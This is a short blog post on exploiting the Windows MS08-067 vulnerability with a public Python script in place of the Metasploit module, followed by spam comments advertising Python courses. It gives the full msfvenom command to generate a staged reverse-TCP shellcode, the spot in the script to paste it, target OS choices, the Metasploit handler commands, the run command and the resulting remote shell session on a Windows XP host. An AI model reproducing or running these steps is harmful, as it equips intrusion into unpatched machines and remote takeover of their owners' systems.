Pages

MS08-067-Python-Script-Exploit

Exploiting MS08-067 without using metasploit.




This has been quite tricky to get working, but in summary from my experience, you cant use 'nc' as a listener for this because the payload needs to be STAGED and 'nc' will only catch STAGELESS payloads.


First download the Python Script.


Next run msfvenom with the arguments to suit your needs

msfvenom -p windows/shell/reverse_tcp LHOST=x.x.x.x LPORT=8080  EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f python -v shellcode --arch x86 --platform windows

Next, replace the shell code in the python script with the shell code you have just created with msfvenom.

Note - LEAVE THE FIRST THREE LINES (NOPS) IN THE PYTHON SCRIPT.
Lines, 47, 48, 49   

shellcode="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
shellcode="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
shellcode+="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
---ENTER SHELLCODE HERE ---


Next make a note of the Operating System & Service Pack that your are trying to execute. 
There are 7 options to choose from:

1   Windows XP SP0/1 Universal
2   Windows 2000 Universal
3   Windows 2003 SP0 Universal
4   Windows 2003 SP1 English
5   Windows XP SP3 French (NX)
6   Windows XP SP3 English (NX)
7   Windows XP SP3 English (AlwaysOn NX)

Next -  Start Metasploit and setup a handler 
use exploit/multi/handler
set LHOST X.X.X.X
set LPORT XXXX
set payload windows/shell/reverse_tcp
exploit -j

Next execute the python script using the correct number that relates to the OS and Service Pack liek so.


python 40279.py 1

You should see the reverse shell returned.

msf exploit(multi/handler) > exploit 

[*] Started reverse TCP handler on X.X.X.X:8080 
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to A.A.A.A
[*] Command shell session 10 opened (X.X.X.X:8080 -> A.A.A.A:1219) at 2017-02-00 15:55:22 +0000

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>


For Reference this is what the traffic looks like for a successful reverse TCP connection for this particular exploit.






12 comments:

  1. Awesome post presented by you..your writing style is fabulous and keep update with your blogs. Best Python Online Training || Learn Python Course

    ReplyDelete
  2. python online training
    artificial intelligence training
    machine learning online training
    we are go to help people to crack interview by providing interview questions. Here I am giving some interview questions related sites, you can visit and prepare for interview
    dbms interview questions
    bootstrap interview questions

    ReplyDelete
  3. Its a wonderful post and very helpful, thanks for all this information. You are including better information.
    Python Training in Noida


    ReplyDelete
  4. Awesome post presented by you..your writing style is fabulous and keep update with your blogs. I am a data analyst and provides data analyst courses in delhi.

    ReplyDelete
  5. Hiii...Thanks for sharing Great Information....Keep Move On...
    Best Python Training in Hyderabad

    ReplyDelete
  6. Good post!Thank you so much for sharing this pretty post,it was so good to read and useful to improve my knowledge as updated one,keep blogging.
    Python training in Electronic City

    ReplyDelete
  7. Hiii...Thanks for sharing Great info...Nice post...Keep move on....
    Python Training in Hyderabad

    ReplyDelete
  8. This comment has been removed by the author.

    ReplyDelete
  9. That was excellent Blog. Thanks for sharing it with us.
    Also, check Python training in Pune

    ReplyDelete